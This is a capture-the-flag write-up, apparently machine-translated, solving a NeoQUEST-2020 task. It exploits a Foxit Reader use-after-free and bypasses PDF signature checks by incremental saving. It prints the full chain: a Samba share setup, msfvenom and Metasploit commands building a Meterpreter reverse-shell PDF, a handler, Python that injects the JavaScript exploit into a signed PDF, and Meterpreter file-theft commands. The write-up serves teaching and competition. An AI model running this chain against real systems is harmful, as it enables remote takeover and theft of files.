We exploit the Foxit Reader vulnerability and bypass the digital signature on the example of the NeoQUEST-2020 task
Today we will talk about the most difficult task NeoQUEST- 2019 2020. Yes, yes, the same thing, with digital signatures and exploitation of the Foxit Reader vulnerability. Yes, yes, that’s right, there are two versions of this task, and in this article we will finally analyze it properly. Welcome to cat 🙂
Initially, the assignment was designed for a confrontation. NeoQUEST-2019however it remains unconquered unfulfilled. We modified it a little and suggested that the participants of the online stage decide NeoQUEST-2020. However, our changes did not affect the complexity of the assignment – only 2 people passed it!
So, the first version provided for the passage on the local network, and the second on the global Internet, for which it is necessary to carry out some manipulations with the exploit and its shellcode.
In the legend NeoQUEST-2020 was given an IP address, upon transition to which the participants saw the application submission form, as well as a list of requirements for them and an example of a correct application. First of all, we carefully study the example of the statement: what if there will be something interesting there? And the truth is, we immediately notice the detail:
Looks like Foxit Reader 9.0.1 is being used here. We are given the name of the software and its version, hmmm … Maybe this is some kind of vulnerability? And we are absolutely right: this version has a use-after-free vulnerability that has received the identifier CVE-2018-9958. An exploit for the vulnerability is in Metasploit (which is already half the success, isn’t it?), Why not try it?
This vulnerability allows you to download files from remote balls. Consider the exploitation of this vulnerability on the example of the original task of 2019.
So, in 2019, the application submission form was located at 192.168.108.129. First of all, launch Kali Linux. You also need to raise the ball with which the main payload will run – Meterpreter. To do this, download / update the samba server:
sudo apt-get install sambaThen create a folder that we will fumble:
mkdir /mnt/files
sudo chmod 777 /mnt/files
Now you need to configure the samba server. To do this, open the configuration file /etc/samba/smb.conf and paste the following text there:
[global]
security = user
workgroup = MYGROUP
server string = Samba
guest account = nobody
map to guest = Bad User
[share]
path = /mnt/files
browseable = Yes
guest ok = Yes
writeable = Yes
public = yes
The last thing to do is restart the samba services:
service smbd restart
service nmbd restart
That’s all. Now the contents of the / mnt / files folder are available at \ 192.168.108.130 share.
The next step is to prepare the exploit itself. To do this, configure Meterpreter and put it on the ball:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.108.130 LPORT=4444 --arch x86 -f exe -o /mnt/files/exploit.exe
sudo chmod 777 /mnt/files/exploit.exe
Now create an exploit PDF file:
msfconsole
use exploit/windows/fileformat/foxit_reader_uaf
set LHOST 192.168.108.130
set EXENAME exploit.exe
set SHARE share
run
We include a handler that will establish communication with Meterpreter when it starts on the victim machine:
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.108.130
set EXITONSESSION false
run -j
That’s all! In the version of the 2020 task, it will not work out this way (only if you do not have an external IP on which you can raise the smb ball). Therefore, to complete this task in the online stage, it is necessary to analyze the exploit and fill in its payload as a shellcode, which implements, for example, reverse (if there is an external IP) or bind shell. We offer you to try to exploit the vulnerability yourself, because it’s better to do it yourself once than read it a hundred times!
It remains to upload the created PDF-document to the application acceptance system, and …
… nothing happens because the file is not signed! It seems that the system checks the signature by some additional means before the document opens in Foxit Reader. Therefore, you need to figure out how to get around signing verification.
The three most recent signature bypass techniques for PDF files are identified by CVE-2018-16042, CVE-2018-18688, and CVE-2018-18689. Fortunately, a team of researchers who discovered these vulnerabilities published examples of PDFs for verification. Check how the system will respond to each attack.
Universal Signature Forgery Attack: The reaction of the system is the same as on an unsigned file. It seems that the signature is not recognized.
Signature Wrapping attack: The same result, the attack does not work.
And here is the Incremental Saving Attack attack:
We are almost there! The system checked the signature and reported that it does not belong to an employee of the company. But we have an example of a document signed by an employee! So all that remains is to show sleight of hand and use Incremental Saving to embed the exploit without breaking the signature.
You can write a library yourself for low-level work with pdf (as the task developer intended) or simply add the exploit to the end (as the tester did when the task was completed). If you look at the structure of the PDF exploit, it becomes clear that it consists of two objects: the JS code that calls use-after-free and runs the exe file on the ball, and the directory, the main object in the PDF file, that sets the action when opening a document, invoking JS code. So, you need to add an object with JS-code to the signed document, as well as update the catalog object. You can do this as follows:
doc = PDF('example.pdf')
js_exploit = "...тут много JS-кода..."
obj_1 = Object({'OpenAction': ObjectReference(28),
'AcroForm': ObjectReference(15),
'Pages': ObjectReference(1),
'PageLayout': '/OneColumn',
'Type': '/Catalog'
}, id=13)
doc.update_object(obj_1, 1)
obj_2 = Object({'S': '/JavaScript',
'JS': js_exploit
})
doc.add_new_object(obj_2)
doc.save(root_id=13)
What do we see? The document successfully passes the verification of the signature! After that, a new session with Meterpreter is established, which means that the exploit works (sometimes this is not the first time due to the probabilistic nature of use-after-free).
Now you can use Meterpreter to find and download the nq2020_key.txt file:
sessions -i 1
search -f nq2020_key.txt
download 'C:UsersmanagerDownloadsnq2020_key.txt
Hooray fanfare and applause! We finally got the key! It was difficult, but nothing was impossible for our participants – we have been convinced of this for many years!
We have told all the secrets of the tasks of the online stage of NeoQUEST-2020, but this does not mean that we will not see you this year: on September 30th the traditional Face-to-face contest will take place in St. Petersburg!
We will hold the final of the hacker competition, as well as talk about the most interesting news in the world of cybersecurity. Cool reports, informative workshops, telegram-quiz, gifts and much more – all this is waiting for you soon! See you 🙂
